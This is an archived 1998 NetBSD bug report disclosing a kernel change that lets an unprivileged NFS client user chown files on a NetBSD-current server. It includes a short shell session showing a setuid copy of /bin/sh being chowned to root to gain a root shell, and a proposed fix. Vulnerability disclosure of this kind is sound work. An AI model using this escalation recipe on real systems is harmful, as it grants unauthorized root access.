Subject: kern/5106: recent chown(2) change indroduces security hazard
To: None <, jaw@Op.Net>
From: Jeff Weisberg <jaw@Op.Net>
List: netbsd-bugs
Date: 03/03/1998 11:19:51
>Number:         5106
>Category:       kern
>Synopsis:       recent chown(2) change dangerous in heterogenous nfs enviornment
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    kern-bug-people (Kernel Bug People)
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Tue Mar  3 08:20:00 1998
>Release:        current - 1998/02
System: NetBSD 1.3C NetBSD 1.3C (PISARRO) #57: Wed Feb 18 09:41:24 EST 1998 sparc


the test as to whether we should actually change the owner of a file
was recently moved from "ufs_vnops.c/ufs_chown()" to

consider the case of mounting a filesystem from a NetBSD-current based
box to a system not NetBSD-current based (either NetBSD-older, or any
non-NetBSD system):

I can now, as a non-privledged user on the 2nd system, chown(2) a
file mounted from the NetBSD-current box succesfully, as we now
take the following path through kernel-land:

	chown() -> sys_chown() -> change_owner() -> nfs_setattr() ---->
to the current box:
	nfsrv_setattr() -> ufs_setattr() -> ufs_chown()

the "don't let non-root people chown things" test is avoided completely.

this can be exploited to gain root privs.


older % cd /dir-mounted-from-netbsd-current
older % cp /bin/sh .
older % chmod u+s sh
older % chown root:wheel sh
older % ls -lg sh
-rwsrwxr-x  1 root     wheel        6113 Mar  1 10:13 sh
older % ./sh
older #

[note: chown(8) does not permit users to run it, a simple c or perl
prog replacement will suffice]


place the test back in the ufs layer. security-holics would likely suggest
(and I'd agree with them) that the test should be done in *both* places.